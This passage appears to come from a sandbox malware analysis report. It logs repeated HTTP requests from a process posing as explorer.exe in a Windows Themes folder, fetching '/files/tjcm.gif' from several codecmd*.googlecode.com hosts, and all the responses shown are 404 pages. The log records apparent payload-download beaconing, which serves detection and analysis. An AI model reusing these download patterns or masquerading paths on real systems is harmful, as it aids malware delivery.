                                                                                                                                                          Jan 13, 2025 13:18:07.674278021 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          30192.168.2.44980866.102.1.82807540C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          Jan 13, 2025 13:18:08.468693972 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd01.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Jan 13, 2025 13:18:09.213392973 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:18:09 GMT
                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                          Jan 13, 2025 13:18:09.213416100 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          31192.168.2.44981574.125.133.82807540C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          Jan 13, 2025 13:18:09.744601011 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd02.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Jan 13, 2025 13:18:10.446755886 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:18:10 GMT
                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                          Jan 13, 2025 13:18:10.446816921 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          32192.168.2.44982664.233.167.82807540C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          Jan 13, 2025 13:18:11.216636896 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd03.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Jan 13, 2025 13:18:11.925045967 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:18:11 GMT
                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                          Jan 13, 2025 13:18:11.925080061 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          33192.168.2.44983366.102.1.82807540C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          Jan 13, 2025 13:18:12.479581118 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd01.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Jan 13, 2025 13:18:13.181576014 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:18:13 GMT
                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                          Jan 13, 2025 13:18:13.181596041 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          34192.168.2.44984374.125.133.82807540C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          Jan 13, 2025 13:18:13.988979101 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd02.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Jan 13, 2025 13:18:14.675137043 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:18:14 GMT
                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                          Jan 13, 2025 13:18:14.675196886 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          35192.168.2.45664064.233.167.82807540C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          Jan 13, 2025 13:18:15.261632919 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd03.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Jan 13, 2025 13:18:16.024343967 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:18:15 GMT
                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                          Jan 13, 2025 13:18:16.024394989 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
                                                                                                                                                          Jan 13, 2025 13:18:16.024410009 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          36192.168.2.45665166.102.1.82807540C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          Jan 13, 2025 13:18:16.809209108 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd01.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Jan 13, 2025 13:18:17.518098116 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:18:17 GMT
                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
